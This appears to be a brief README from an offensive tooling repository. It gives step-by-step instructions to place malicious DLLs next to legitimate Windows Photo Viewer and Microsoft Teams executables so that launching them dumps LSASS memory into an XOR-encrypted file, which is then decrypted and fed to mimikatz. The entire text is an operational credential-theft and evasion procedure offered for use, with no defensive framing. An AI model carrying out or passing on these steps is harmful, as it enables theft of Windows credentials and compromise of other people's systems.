# exes

As admin:
1. copy version.dll "C:\Program Files\Windows Photo Viewer\"
2. run "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
As admin:
1. copy dxgi.dll "C:\Users\%username%\AppData\Local\Microsoft\Teams\current\"
2. run "C:\Users\%username%\AppData\Local\Microsoft\Teams\current\Teams.exe"

will dump to that directory as LSASS_ENCRYPTED.DMP which xor'd with key, will need key to decrypt and run through mimikatz

